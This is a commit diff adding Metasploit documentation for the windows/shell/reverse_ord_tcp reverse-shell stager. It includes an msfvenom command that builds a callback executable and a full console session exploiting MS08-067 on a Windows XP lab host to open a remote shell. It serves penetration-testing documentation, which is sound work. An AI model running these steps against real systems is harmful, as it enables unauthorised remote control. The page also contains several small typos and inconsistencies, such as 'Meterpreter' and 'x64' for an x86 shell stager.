Land #10474, add documention for windows/shell/reverse_ord_tcp
commit
d25aad571f
|
@ -0,0 +1,125 @@
|
||||||
|
windows/shell/reverse_ord_tmp:Windows Command Shell, Reverse Ordinal TCP Stager is an unique windows payload for Metasploit Framework.
|
||||||
|
It is really small (<100 bytes), it uses the existing ws2_32.dll in memory in connect and load the next stage of the payload.
|
||||||
|
|
||||||
|
It provides a shell on the target machine which can be used to achieve almost anything on the target pc.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This Meterpreter payload is suitable for the following environments:
|
||||||
|
|
||||||
|
* Windows x64
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
windows/shell/reverse_tcp is typically used in two different ways.
|
||||||
|
|
||||||
|
1. As a payload for an exploit:
|
||||||
|
|
||||||
|
To check its compatibility with an exploit, select the exploit in the msf console and type the ```info``` command. The output will be similar to:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf5 payload(windows/shell/reverse_tcp) > info
|
||||||
|
|
||||||
|
Name: Windows Command Shell, Reverse TCP Stager
|
||||||
|
Module: payload/windows/shell/reverse_tcp
|
||||||
|
Platform: Windows
|
||||||
|
Arch: x86
|
||||||
|
Needs Admin: No
|
||||||
|
Total size: 283
|
||||||
|
Rank: Normal
|
||||||
|
|
||||||
|
Provided by:
|
||||||
|
spoonm <spoonm@no$email.com>
|
||||||
|
sf <stephen_fewer@harmonysecurity.com>
|
||||||
|
hdm <x@hdm.io>
|
||||||
|
skape <mmiller@hick.org>
|
||||||
|
|
||||||
|
Basic options:
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST yes The listen address (an interface may be specified)
|
||||||
|
LPORT 4444 yes The listen port
|
||||||
|
|
||||||
|
Description:
|
||||||
|
Spawn a piped command shell (staged). Connect back to the attacker
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
If the platform field includes Windows, then windows/shell/reverse_ord_tcp can be used as the
|
||||||
|
payload.
|
||||||
|
|
||||||
|
To use at as a payload for an exploit, use the following commands:
|
||||||
|
1. In msfconsole, select an exploit module compatible with windows.
|
||||||
|
2. Configure the options for that exploit.
|
||||||
|
3. Then run the following command: ```set windows/shell/reverse_ord_tcp```
|
||||||
|
4. Set the ```LHOST``` option, to be the IP address that the payload should connect to.
|
||||||
|
5. Then run the command: ```exploit```.
|
||||||
|
|
||||||
|
If the exploit is successful, the payload will get executed.
|
||||||
|
|
||||||
|
|
||||||
|
2. As a standalone(executable)
|
||||||
|
|
||||||
|
To use it as an executable, msfvenom can be used(msfvenom replaced msfpayload and msfencode in the year //)
|
||||||
|
|
||||||
|
A typical example of doing this is as follows:
|
||||||
|
|
||||||
|
|
||||||
|
```./msfvenom -p windows/shell/reverse_ord_tcp LHOST=192.168.23.1 LPORT=4444 -f exe -o /tmp/ordpayload.exe```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
The following commands are run on a Windows XP SP 2 English Machine:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_ord_tcp
|
||||||
|
payload => windows/shell/reverse_ord_tcp
|
||||||
|
msf exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
|
||||||
|
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.56.1
|
||||||
|
LHOST => 192.168.56.1
|
||||||
|
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.56.3
|
||||||
|
RHOST => 192.168.56.3
|
||||||
|
msf exploit(windows/smb/ms08_067_netapi) > show options
|
||||||
|
|
||||||
|
Module options (exploit/windows/smb/ms08_067_netapi):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
RHOST 192.168.56.3 yes The target address
|
||||||
|
RPORT 445 yes The SMB service port (TCP)
|
||||||
|
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (windows/shell/reverse_ord_tcp):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST 192.168.56.1 yes The listen address (an interface may be specified)
|
||||||
|
LPORT 4444 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Automatic Targeting
|
||||||
|
|
||||||
|
|
||||||
|
msf exploit(windows/smb/ms08_067_netapi) > exploit
|
||||||
|
```
|
||||||
|
|
||||||
|
The above commands will result into the following scenario(leading to a shell on the target machine ):
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||||
|
[*] 192.168.56.3:445 - Automatically detecting the target...
|
||||||
|
[*] 192.168.56.3:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
|
||||||
|
[*] 192.168.56.3:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
|
||||||
|
[*] 192.168.56.3:445 - Attempting to trigger the vulnerability...
|
||||||
|
[*] Encoded stage with x86/shikata_ga_nai
|
||||||
|
[*] Sending encoded stage (267 bytes) to 192.168.56.3
|
||||||
|
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.3:1034) at 2018-08-17 15:25:02 +0530
|
||||||
|
```
|
||||||
|
|
Loading…
Reference in New Issue